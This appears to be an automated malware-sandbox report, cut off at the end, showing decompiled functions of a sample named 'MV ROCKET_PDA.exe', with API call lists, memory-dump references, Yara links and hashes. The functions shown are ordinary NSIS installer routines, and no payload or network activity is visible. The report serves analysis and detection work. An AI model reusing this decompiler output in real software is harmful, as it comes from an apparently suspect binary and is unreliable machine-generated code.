                                                                                            • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                                                            • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                            • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                            0x00405e2b
                                                                                            0x00405e33
                                                                                            0x00405e47
                                                                                            0x00405e47
                                                                                            0x00405e4d
                                                                                            0x00405e5a
                                                                                            0x00405e5a
                                                                                            0x00405e5b
                                                                                            0x00405e5d
                                                                                            0x00405e61
                                                                                            0x00405e63
                                                                                            0x00405e6c
                                                                                            0x00405e6e
                                                                                            0x00405e88
                                                                                            0x00405e90
                                                                                            0x00405e90
                                                                                            0x00405e95
                                                                                            0x00405e97
                                                                                            0x00405e99
                                                                                            0x00405e9d
                                                                                            0x00405e9e
                                                                                            0x00405ea1
                                                                                            0x00405ea9
                                                                                            0x00405eab
                                                                                            0x00405eaf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405eb5
                                                                                            0x00405eba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405eba
                                                                                            0x00405ebf

                                                                                            APIs
                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\MV ROCKET_PDA.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Char$Next$Prev
                                                                                            • String ID: "C:\Users\user\Desktop\MV ROCKET_PDA.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 589700163-1049475171
                                                                                            • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                            • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                                                            • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                            • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                            0x00403efc
                                                                                            0x00403f90
                                                                                            0x00000000
                                                                                            0x00403f90
                                                                                            0x00403f0d
                                                                                            0x00403f11
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403f17
                                                                                            0x00403f20
                                                                                            0x00403f23
                                                                                            0x00403f23
                                                                                            0x00403f29
                                                                                            0x00403f2f
                                                                                            0x00403f2f
                                                                                            0x00403f3b
                                                                                            0x00403f41
                                                                                            0x00403f48
                                                                                            0x00403f4b
                                                                                            0x00403f4e
                                                                                            0x00403f50
                                                                                            0x00403f50
                                                                                            0x00403f58
                                                                                            0x00403f5e
                                                                                            0x00403f5e
                                                                                            0x00403f68
                                                                                            0x00403f6d
                                                                                            0x00403f70
                                                                                            0x00403f75
                                                                                            0x00403f78
                                                                                            0x00403f78
                                                                                            0x00403f88
                                                                                            0x00403f88
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2320649405-0
                                                                                            • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                            • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                                                            • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                            • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0x8800
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                            0x004026af
                                                                                            0x004026b1
                                                                                            0x004026bd
                                                                                            0x004026c0
                                                                                            0x004026ca
                                                                                            0x004026ce
                                                                                            0x004026ce
                                                                                            0x004026d4
                                                                                            0x004026e1
                                                                                            0x004026e9
                                                                                            0x004026ec
                                                                                            0x004026f2
                                                                                            0x00402700
                                                                                            0x00402705
                                                                                            0x00402709
                                                                                            0x0040270c
                                                                                            0x00402715
                                                                                            0x00402721
                                                                                            0x00402725
                                                                                            0x00402728
                                                                                            0x00402732
                                                                                            0x00402751
                                                                                            0x00402739
                                                                                            0x0040273e
                                                                                            0x00402746
                                                                                            0x00402749
                                                                                            0x0040274e
                                                                                            0x0040274e
                                                                                            0x00402758
                                                                                            0x00402758
                                                                                            0x0040276a
                                                                                            0x00402771
                                                                                            0x00402783
                                                                                            0x00402783
                                                                                            0x00402789
                                                                                            0x00402789
                                                                                            0x00402794
                                                                                            0x00402795
                                                                                            0x00402799
                                                                                            0x0040279d
                                                                                            0x004027a3
                                                                                            0x004027a3
                                                                                            0x004027aa
                                                                                            0x00402197
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                            • GlobalFree.KERNEL32 ref: 00402758
                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                            • GlobalFree.KERNEL32 ref: 00402771
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3294113728-0
                                                                                            • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                            • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                                                            • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                            • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                            0x00404eb9
                                                                                            0x00404ec5
                                                                                            0x00404ec8
                                                                                            0x00404ece
                                                                                            0x00404eda
                                                                                            0x00404edd
                                                                                            0x00404ee0
                                                                                            0x00404ee6
                                                                                            0x00404ee6
                                                                                            0x00404eec
                                                                                            0x00404ef4
                                                                                            0x00404ef7
                                                                                            0x00404f14
                                                                                            0x00404f18
                                                                                            0x00404f21
                                                                                            0x00404f21
                                                                                            0x00404f2b
                                                                                            0x00404f34
                                                                                            0x00404f40
                                                                                            0x00404f47
                                                                                            0x00404f4b
                                                                                            0x00404f4e
                                                                                            0x00404f61
                                                                                            0x00404f6f
                                                                                            0x00404f6f
                                                                                            0x00404f73
                                                                                            0x00404f75
                                                                                            0x00404f78
                                                                                            0x00000000
                                                                                            0x00404f78
                                                                                            0x00404ef9
                                                                                            0x00404f01
                                                                                            0x00404f09
                                                                                            0x00404f0f
                                                                                            0x00000000
                                                                                            0x00404f0f
                                                                                            0x00404f09
                                                                                            0x00404ef7
                                                                                            0x00404f82

                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                            • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                            • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,74E5EA30), ref: 00404F0F
                                                                                            • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2531174081-0
                                                                                            • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                            • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                                                            • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                            • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                            0x00404790
                                                                                            0x0040479d
                                                                                            0x004047a3
                                                                                            0x004047e1
                                                                                            0x004047e1
                                                                                            0x004047f0
                                                                                            0x004047f7
                                                                                            0x00000000
                                                                                            0x004047f9
                                                                                            0x004047a5
                                                                                            0x004047b4
                                                                                            0x004047bc
                                                                                            0x004047bf
                                                                                            0x004047d1
                                                                                            0x004047d7
                                                                                            0x004047de
                                                                                            0x00000000
                                                                                            0x004047de
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                                                            • GetMessagePos.USER32 ref: 004047A5
                                                                                            • ScreenToClient.USER32 ref: 004047BF
                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                            • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                                                            • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                            • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0x8800
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                            0x00402b7b
                                                                                            0x00402b89
                                                                                            0x00402b8f
                                                                                            0x00402b8f
                                                                                            0x00402b9d
                                                                                            0x00402b9f
                                                                                            0x00402ba5
                                                                                            0x00402bac
                                                                                            0x00402bae
                                                                                            0x00402bae
                                                                                            0x00402bc4
                                                                                            0x00402bd4
                                                                                            0x00402be6
                                                                                            0x00402be6
                                                                                            0x00402bee

                                                                                            APIs
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                            • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                                                            • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                            • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 85%
                                                                                            			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}











                                                                                            0x00402337
                                                                                            0x0040233c
                                                                                            0x00402346
                                                                                            0x00402350
                                                                                            0x00402353
                                                                                            0x0040235d
                                                                                            0x0040236d
                                                                                            0x00402374
                                                                                            0x0040237c
                                                                                            0x0040238a
                                                                                            0x0040238e
                                                                                            0x00402399
                                                                                            0x00402399
                                                                                            0x0040239d
                                                                                            0x004023a1
                                                                                            0x004023a7
                                                                                            0x004023ac
                                                                                            0x004023ac
                                                                                            0x004023b0
                                                                                            0x004023bc
                                                                                            0x004023bc
                                                                                            0x004023d5
                                                                                            0x004023d7
                                                                                            0x004023d7
                                                                                            0x004023da
                                                                                            0x004024b0
                                                                                            0x004024b0
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp
                                                                                            • API String ID: 1356686001-682200717
                                                                                            • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                                                            • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
